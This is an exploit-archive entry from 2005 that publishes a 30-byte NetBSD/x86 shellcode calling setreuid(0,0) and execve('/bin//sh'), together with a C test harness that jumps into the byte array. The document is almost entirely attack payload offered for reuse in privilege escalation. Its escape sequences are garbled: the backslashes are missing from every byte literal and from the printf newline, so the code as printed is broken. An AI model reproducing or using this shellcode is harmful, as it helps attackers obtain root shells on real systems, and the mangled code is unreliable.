[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 30 bytes
# Published : 2005-11-30
# Author : p. minervini
# Previous Title : netbsd/x86 callback shellcode (port 6666) 83 bytes
# Next Title : netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes


/*
 *  minervini at neuralnoise dot com (c) 2005
 *  NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL);
 */

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

char scode[] =
  "x31xc0"             // xor    %eax,%eax
  "x50"                 // push   %eax
  "x50"                 // push   %eax
  "x50"                 // push   %eax
  "x34x7e"             // xor    $0x7e,%al
  "xcdx80"             // int    $0x80
  "x58"                 // pop    %eax
  "x68x2fx2fx73x68" // push   $0x68732f2f
  "x68x2fx62x69x6e" // push   $0x6e69622f
  "x89xe3"             // mov    %esp,%ebx
  "x50"                 // push   %eax
  "x54"                 // push   %esp
  "x53"                 // push   %ebx
  "x50"                 // push   %eax
  "x34x3b"             // xor    $0x3b,%al
  "xcdx80";            // int    $0x80

int main() {
   void (*code) () = (void *) scode;
   printf("length: %dn", strlen(scode));
   code();
   return (0);
}

// www.Syue.com [2005-11-30]